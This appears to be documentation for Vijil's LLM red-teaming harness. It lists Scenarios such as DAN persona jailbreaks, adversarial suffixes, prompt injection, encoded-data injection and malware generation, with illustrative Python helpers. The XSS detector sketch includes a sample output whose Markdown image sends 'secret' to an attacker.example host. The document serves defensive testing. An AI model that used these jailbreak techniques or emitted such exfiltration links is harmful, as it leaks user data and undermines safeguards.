Scenarios

Scenarios are groups of related Probes. Each Scenario is its own Harness, but multiple Scenarios can also be composed to form other Harnesses.
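
As a rough illustration of this composition, the sketch below models Probes, Scenarios, and Harnesses as plain Python data classes. The class names, field names, and Probe names are assumptions chosen for illustration; they are not the Vijil API.

```python
from dataclasses import dataclass, field


@dataclass(frozen=True)
class Probe:
    """A single test (hypothetical structure, for illustration only)."""
    name: str


@dataclass
class Scenario:
    """A named group of related Probes."""
    name: str
    probes: list[Probe] = field(default_factory=list)


@dataclass
class Harness:
    """A runnable collection built from one or more Scenarios."""
    name: str
    scenarios: list[Scenario] = field(default_factory=list)

    @classmethod
    def from_scenario(cls, scenario: Scenario) -> "Harness":
        # A Scenario on its own can be treated as a single-Scenario Harness.
        return cls(name=scenario.name, scenarios=[scenario])

    def all_probes(self) -> list[Probe]:
        # Flatten the Probes of every Scenario, preserving order.
        return [p for s in self.scenarios for p in s.probes]


# Probe names below are made up for the example.
glitch = Scenario("Glitch", [Probe("glitch_tokens")])
dan = Scenario("Do Anything Now", [Probe("dan_persona")])

single = Harness.from_scenario(glitch)
combined = Harness("Custom", [glitch, dan])
```

Here `single` stands for a Scenario run as its own Harness, and `combined` for a Harness composed from two Scenarios.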

Ethical Theories

Ethical Theories Scenario includes both vanilla and jailbreaking Probes whose prompts test the model’s understanding of ethical theories.

Ethics Simulation

Ethics Simulation Scenario contains vanilla and jailbreaking prompts that ask about the moral valence of a simulated situation.

Copyrighted Content

Copyrighted Content Scenario contains prompts that attempt to get the model to repeat copyrighted content from books and newspapers.

Private Data Leakage

Private Data Leakage Scenario contains prompts that test whether a model will leak private data.

Adversarial GLUE

Adversarial GLUE Scenario currently makes up the entirety of the Robustness Harness. The Scenario measures whether the model’s performance on the natural language understanding tasks in GLUE is affected by perturbations to the sentences in the tasks.
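
One simple way to quantify this effect is to compare accuracy on the original sentences with accuracy on their perturbed versions. The sketch below is only an illustration of that idea: the `accuracy_drop` helper, the toy classifier, and the two examples are assumptions, not the metric or data the Scenario actually uses.

```python
from typing import Callable, Sequence

# (original sentence, perturbed sentence, gold label)
Example = tuple[str, str, int]


def accuracy_drop(classify: Callable[[str], int], examples: Sequence[Example]) -> float:
    """Return accuracy on original inputs minus accuracy on perturbed inputs."""
    if not examples:
        raise ValueError("examples must not be empty")
    clean = sum(classify(orig) == label for orig, _, label in examples)
    perturbed = sum(classify(pert) == label for _, pert, label in examples)
    return (clean - perturbed) / len(examples)


def toy_classifier(sentence: str) -> int:
    # Stand-in for a model: predicts positive (1) only on an exact keyword match.
    return 1 if "good" in sentence.split() else 0


examples = [
    ("a good film", "a g00d film", 1),  # character-level perturbation
    ("a dull film", "a dull fi1m", 0),
]
drop = accuracy_drop(toy_classifier, examples)
```

A drop of zero would mean the perturbations did not change the stand-in model's accuracy; a positive drop means it performed worse on the perturbed sentences.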

Professional Bias

Professional Bias Scenario measures whether the model associates gender with occupations.

Gender-income Bias

Gender-income Bias Scenario checks whether the model predicts a person’s income in a gender-biased manner.

Stereotype

Stereotype Scenario currently makes up the entirety of the Stereotype Harness. The Scenario measures whether the model reinforces stereotypes about religion, race, ethnicity, age, disability, national origin, and gender in its responses.

Compounding Hallucination

Compounding Hallucination Scenario attempts to prompt the model into generating hallucinations by having it over-commit to an initial mistake.

Misleading Information

Misleading Information Scenario checks whether the model is able to refute false assertions presented in the input prompt.

Package Hallucination

Package Hallucination Scenario contains prompts designed to elicit sample code importing non-existent Python packages.
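
A check of this kind could, for example, parse the generated code and compare its imports against a list of packages known to exist. The sketch below assumes a small hard-coded `KNOWN` set and a made-up model output; a real check would need an authoritative package index, and this is not necessarily how the Scenario's detector works.

```python
import ast


def imported_packages(code: str) -> set[str]:
    """Return the top-level package names imported by a Python snippet.

    Raises SyntaxError if the snippet is not valid Python.
    """
    names: set[str] = set()
    for node in ast.walk(ast.parse(code)):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            # level == 0 skips relative imports such as "from . import x".
            names.add(node.module.split(".")[0])
    return names


def hallucinated_packages(code: str, known: set[str]) -> set[str]:
    """Return imported packages that are absent from the known set."""
    return imported_packages(code) - known


# Illustrative allowlist and model output (both are assumptions).
KNOWN = {"os", "json", "numpy", "requests"}
model_output = "import numpy as np\nfrom quantumjsonlib.fast import loads\n"
missing = hallucinated_packages(model_output, KNOWN)
```

In this example `missing` contains only the invented package name, since `numpy` is in the allowlist.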

Hallucination: Goodside

Hallucination: Goodside Scenario consists of the “Who is Riley?” and “Davidjl” Probes, which were designed by Riley Goodside to elicit hallucinations.

Social Values

Social Values Scenario currently consists of a Probe that looks for promotion of quack medicine.

Known Malware

Known Malware Scenario checks for the existence of known signatures of spam and viruses in the output.

Malware Generation

Malware Generation Scenario contains Probes that attempt to make the model generate malware.

Prompt Injection

Prompt Injection Scenario consists of prompt injections that attempt to trick the model into producing specific strings.

Prompt Injection: Encoded Data

Prompt Injection: Encoded Data Scenario tests whether a model will decode encoded strings injected into the prompt.
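
To make the idea concrete, the sketch below base64-encodes a harmless marker string, wraps it in a prompt, and checks whether a response contains the decoded marker. The prompt wording, the `CANARY` string, and both helper functions are assumptions for illustration; the Scenario's actual encodings and payloads may differ.

```python
import base64

CANARY = "The quick brown fox"  # harmless marker string (illustrative)


def build_prompt(payload: str) -> str:
    """Embed a base64-encoded payload in a simple decoding request."""
    encoded = base64.b64encode(payload.encode("utf-8")).decode("ascii")
    return (
        "Decode the following base64 string and reply with the result only:\n"
        f"{encoded}"
    )


def decoded_payload_present(response: str, payload: str) -> bool:
    """Return True if the response contains the decoded payload (case-insensitive)."""
    return payload.lower() in response.lower()


prompt = build_prompt(CANARY)
```

A response that contains the decoded marker indicates that the model followed the encoded content.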

Cross-site Scripting (XSS)

Cross-site Scripting (XSS) Scenario aims to get the model to produce cross-site scripting content in a Markdown image.
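
One plausible way to flag such output is to scan it for Markdown images whose URL uses a script-capable scheme or carries query data to an untrusted host. The heuristic, the regular expression, and the host names below are assumptions for illustration, not the Scenario's actual detector.

```python
import re
from urllib.parse import urlparse

# Captures the URL part of a Markdown image: ![alt](url ...)
MD_IMAGE = re.compile(r"!\[[^\]]*\]\(\s*([^)\s]+)")


def suspicious_image_urls(
    text: str, trusted_hosts: frozenset[str] = frozenset()
) -> list[str]:
    """Return Markdown image URLs that look like script or exfiltration vectors."""
    flagged = []
    for url in MD_IMAGE.findall(text):
        parsed = urlparse(url)
        scheme = parsed.scheme.lower()
        if scheme in {"javascript", "data"}:
            flagged.append(url)
        elif (
            scheme in {"http", "https"}
            and parsed.hostname not in trusted_hosts
            and parsed.query
        ):
            # A query string on an untrusted host may carry leaked data.
            flagged.append(url)
    return flagged


output = (
    "Here you go ![logo](https://attacker.example/p.png?q=secret) "
    "and ![ok](https://docs.example/img.png)"
)
flagged = suspicious_image_urls(output)
```

Only the first image is flagged here, because the second URL has no query string.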

Adversarial Suffix

Adversarial Suffix Scenario uses adversarial suffixes to elicit instructions on how to steal from a non-profit organization.

Glitch

Glitch Scenario contains prompts that use glitch tokens to disrupt expected model behavior.

Do Anything Now

Do Anything Now Scenario attempts to get the model to escape its Guardrails by prompting it to take on a special persona.

Slur Continuation

Slur Continuation Scenario tests whether a model will continue a slur when provided with leading text.

Ethical Harms

Ethical Harms Scenario checks for ethical harms in the model’s output, such as bullying, deadnaming, profanity, sexual content, and slurs.

Real Toxicity Prompts

Real Toxicity Prompts Scenario contains input text, taken from web data, that is toxic if completed.

Scenario ID	Name	Description
vijil.scenarios.reliability_robustness_distributionalrobustness	Distributional Robustness	Tests sensitivity to prompt alterations that aim to create out-of-distribution inputs.
vijil.scenarios.security_confidentiality_dataprivacy	Data Privacy	Tests for leakage of training data.
vijil.scenarios.safety_compliance_normcompliance	Norm Compliance	Tests for offensive or culturally insensitive outputs.
vijil.scenarios.security_integrity_manipulationresistance	Manipulation Resistance	Tests the agent’s resistance to manipulative inputs.
vijil.scenarios.reliability_correctness_factualaccuracy	Factual Accuracy	Tests for hallucinations or misinformation.
vijil.scenarios.reliability_correctness_logicalvalidity	Logical Validity	Tests for the agent’s tendency to make errors in deductive logic.
vijil.scenarios.safety_compliance_policycompliance	Policy Compliance	Tests for adherence to common organizational guidelines and policies.
vijil.scenarios.safety_compliance_ethicalbehavior	Ethical Behavior	Tests whether the agent can produce unethical outputs.
vijil.scenarios.reliability_robustness_contextualrobustness	Contextual Robustness	Tests whether the agent is robust against noisy inputs.
vijil.scenarios.security_confidentiality_userprivacy	User Privacy	Tests whether the agent exposes end-user PII.
vijil.scenarios.security_confidentiality_modelprivacy	Model Privacy	Tests whether the agent leaks private model information.
vijil.scenarios.integrity	Integrity	Tests the agent’s ability to avoid adhering to adversarial prompt injections.
vijil.scenarios.availability	Availability	Tests the agent’s ability to withstand denial-of-service attack attempts.
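
Most of the Scenario IDs in the table appear to follow a `vijil.scenarios.<dimension>_<sub-dimension>_<name>` pattern, while the last two have a single segment. The sketch below splits an ID along those lines. Both the interpretation of the three segments and the `parse_scenario_id` helper are assumptions inferred from the table; the helper is not part of any Vijil library.

```python
from typing import NamedTuple, Optional

PREFIX = "vijil.scenarios."


class ScenarioId(NamedTuple):
    dimension: Optional[str]      # e.g. "security" (assumed meaning)
    sub_dimension: Optional[str]  # e.g. "confidentiality" (assumed meaning)
    name: str                     # e.g. "userprivacy"


def parse_scenario_id(scenario_id: str) -> ScenarioId:
    """Split a Scenario ID into its underscore-separated segments."""
    if not scenario_id.startswith(PREFIX):
        raise ValueError(f"unexpected prefix in {scenario_id!r}")
    parts = scenario_id[len(PREFIX):].split("_")
    if len(parts) == 3:
        return ScenarioId(*parts)
    if len(parts) == 1 and parts[0]:
        # Single-segment IDs such as "vijil.scenarios.integrity".
        return ScenarioId(None, None, parts[0])
    raise ValueError(f"unrecognized Scenario ID shape: {scenario_id!r}")


parsed = parse_scenario_id("vijil.scenarios.security_confidentiality_userprivacy")
short = parse_scenario_id("vijil.scenarios.integrity")
```

Grouping parsed IDs by their first segment would give one way to list the Scenarios under each top-level category.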
